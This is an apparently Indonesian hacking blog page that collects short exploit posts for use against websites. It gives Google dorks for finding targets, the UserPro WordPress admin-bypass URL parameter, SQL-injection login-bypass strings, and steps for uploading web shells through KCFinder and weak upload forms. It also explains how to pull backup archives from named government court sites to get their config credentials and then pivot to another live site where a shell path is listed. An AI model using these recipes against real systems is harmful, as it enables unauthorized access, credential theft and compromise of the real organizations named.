WordPress Plugin Userpro - Authentication Bypass

WordPress Plugin Userpro - Authentication Bypass

By   Juni 08, 2018   Tidak ada komentar:

# Exploit Title: Userpro – WordPress Plugin – Authentication Bypass
# Google Dork: inurl:/plugins/userpro
# Date: 11.04.2017
# Exploit Author: Colette Chamberland (Wordfence), Iain Hadgraft (Duke University)
# Vendor Homepage: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9
# Software Link: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9
# Version: <= 4.6.17
# Tested on: Wordpress 4.8.3
# CVE : requested, not assigned yet.

Description
================================================================================
 The userpro plugin has the ability to bypass login authentication for the user
 'admin'. If the site does not use the standard username 'admin' it is not affected.
  
PoC
================================================================================
1 - Google Dork inurl:/plugins/userpro

2 - Browse to a site that has the userpro plugin installed.

3 - Append ?up_auto_log=true to the target: http://www.targetsite.com/?up_auto_log=true

4 - If the site has a default 'admin' user you will now see the wp menu at the top of the site. You are now logged in
will full administrator access.
================================================================================

10/25/2017 – Wordfence notified of issue by Iain Hadgraft.
10/26/2017 – Vendor resolved the issue in the plugin.
11/04/2017 - Disclosure.

Read More

Simple Upload dan Download File exploit

Simple Upload dan Download File exploit

By   April 03, 2018   Tidak ada komentar:

Dork : intext:"Simple Upload dan Download File"
         : Simple Upload dan Download File
selebihnya kembangin lgi
dorking di google pilih salah satu target
exploit : site.com/[pacth]/upload.hp
tampilan vuln



Allowed file types : .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pdf, .rar, .zip,.7z
upload ur file with bypas ext
acces file : /files/urnamefile

Read More

Cara cheat/hack SoulCraft tanpa root dan aplikasi

Cara cheat/hack SoulCraft tanpa root dan aplikasi

By   Maret 17, 2018   2 komentar:

Assalamualaikum

Hallo gaes bgi kalian yang main Soulcraft tpi pengen ngecheat tanpa root dan aplikasi nih mimin kasih tau caranya

Cekidor

Bahan - bahan :

-Koneksi internet
-game soulcraft

Tutorial :

buka game SoulCraft nya dulu
login ke Soulcraft akun untuk email dan passwordnya bisa pakek seperti ini
email:soulcraft@hack.com
password:soulcraft
ok terus login
dan jebret wkwkwkwk kebukak semua dah lvlnya,charaternya,senjatanya :'v
God luck,sekian

Read More

Admin login bypass,Fresh Dork

Admin login bypass,Fresh Dork

By   Maret 11, 2018   Tidak ada komentar:

Assalamualaikum
kali ini mimin mau share Dork Fresh bypass admin lngsung ae yo

Dork : inurl:pdetail.php?IDZ=

Admin Login page : /admincp/login.php
Username/password : '=''or'

ok,sekian :)

Read More

Backup Zip Download

Backup Zip Download

By   Februari 22, 2018   Tidak ada komentar:

backup zip download

AUTHOR : ice-cream
THNKS  : IndoXploit - Sanjungan Jiwa - Surabaya Blackhat - Typical Idiot Security

site:go.id intext:"pengadilan"
and many more..

EXAMPLE :
http://pn-tegal.go.id/jdih.zip
http://pn-pasirpengaraian.go.id/sipp.zip

NB :
If u was download that backup, u can look config file from that website

CONTOH :
http://pn-tegal.go.id/jdih.zip
http://pn-pasirpengaraian.go.id/sipp.zip
aku ambil contoh web ini http://www.sijunjung.go.id/v2.zip
tinggal kamu reverse ip atau ip nya kamu dorking pake bing
http://viewdns.info/reverseip/?host=www.sijunjung.go.id&t=1
trus aku dapet web 1 server yang vuln bypass admin
http://moneynlove.com/admin/
http://moneynlove.com/images/buku/default.php

NB : nah dari hasil si backup zipnya kan ada file confignya tuh.. coba aja login lewat adminer di shell yang 1 servernya..
mungkin terlihat sedikit berbelit,
tergantung insting dan kreativitas mu~

Read More

Exploit Bypass Admin Page new dork

Exploit Bypass Admin Page new dork

By   Januari 14, 2018   Tidak ada komentar:

Dork:
intext:Powered By:Supercon Infoservices Pvt.Ltd.

exploit :
site.com//webadmin/login.php
username :'=' 'OR'
Password :'=' 'OR'

upload ur shell with tamper data

Read More

KCFinder File Upload In PhpJabbers

KCFinder File Upload In PhpJabbers

By   Desember 16, 2017   Tidak ada komentar:

Exploit Title   : KCFinder File Upload In PhpJabbers
Author          : ice-cream - khunerable
Vendor Homepage : http://www.phpjabbers.com/
Vendor Github   : -
Date            : 10 dec 2017
Tested on       : Ubuntu 16.04.2 LTS ( BackBox ), Windows 7

-------------------------------------------------------------
Dork       : inurl:/cms/app/web/
Bug Victim : http://localhost/[path]/core/libs/kcfinder/browse.php
Example    : https://www.hardyfarmspeanuts.com/cms/core/libs/kcfinder/browse.php

POC :
[-] Upload Ur Shell [.php.fla] or [.php3]
[-] if done, u can access full ur backdoor [ NB : not all web's can upload .php.fla or .php3]

Path Shell : http://localhost/[path]/app/web/upload/files/urshell.php

THNK'S TO : Pak Haxor - Grac3 - Lastc0de - KONSLET - SPEEDY03 - AnoaGhost And All Typical Idiot Security Member's

Dork lainya

Dork : Copyright © 2017 PHPJabbers.com intitle:Stiva Blog Script by PHPJabbers.com
# intitle:Yellow Pages Script by PHPJabbers.com intext:ADMIN LOGIN
# intitle:Member Login Script by PHPJabbers.com intext:ADMIN LOGIN
# intitle:Knowledge Base Builder script by PHPJabbers.com intext:ADMIN LOGIN
# intitle:Simple CMS | Login intext:ADMIN LOGIN
# PHP Scripts Copyright © 2017 StivaSoft Ltd
# inurl:content/index.php? intext:ADMIN LOGIN
# inurl:/SimpleCMS intext:ADMIN LOGIN
# inurl:webCMS/index.php? intext:ADMIN LOGIN
# inurl:/visualVerge-Programs/webCMS/
# Powered by Sytek intext:ADMIN LOGIN
# inurl:/app/web/img/
# inurl:/app/web/upload/files/

Read More